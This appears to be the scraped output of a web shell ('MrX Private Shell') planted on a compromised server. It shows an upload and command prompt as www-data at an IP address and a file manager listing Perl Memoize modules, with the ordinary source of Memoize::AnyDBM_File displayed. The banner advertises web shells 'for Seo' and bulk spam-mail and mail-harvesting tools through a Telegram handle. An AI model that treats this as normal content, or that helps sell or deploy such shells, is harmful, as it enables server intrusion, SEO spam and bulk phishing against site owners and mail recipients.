__  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

www-data@216.73.216.10: ~ $
use strict; use warnings;

package Memoize::AnyDBM_File;
our $VERSION = '1.16';

our @ISA = qw(DB_File GDBM_File Memoize::NDBM_File SDBM_File ODBM_File) unless @ISA;

for my $mod (@ISA) {
  if (eval "require $mod") {
    $mod = 'NDBM_File'
		if $mod eq 'Memoize::NDBM_File'
		and eval { NDBM_File->VERSION( '1.16' ) };
    print STDERR "AnyDBM_File => Selected $mod.\n" if our $Verbose;
    @ISA = $mod;
    return 1;
  }
}

die "No DBM package was successfully found or installed";

__END__

=pod

=head1 NAME

Memoize::AnyDBM_File - glue to provide EXISTS for AnyDBM_File for Storable use

=head1 DESCRIPTION

This class does the same thing as L<AnyDBM_File>, except that instead of
L<NDBM_File> itself it loads L<Memoize::NDBM_File> if L<NDBM_File> lacks
L<EXISTS|perltie/C<EXISTS>> support.

Code which requires perl 5.37.3 or newer should simply use L<AnyBDM_File> directly.

=cut

Filemanager

Name Type Size Permission Actions
AnyDBM_File.pm File 886 B 0644
Expire.pm File 10.59 KB 0644
NDBM_File.pm File 926 B 0644
SDBM_File.pm File 520 B 0644
Storable.pm File 1.35 KB 0644
Filemanager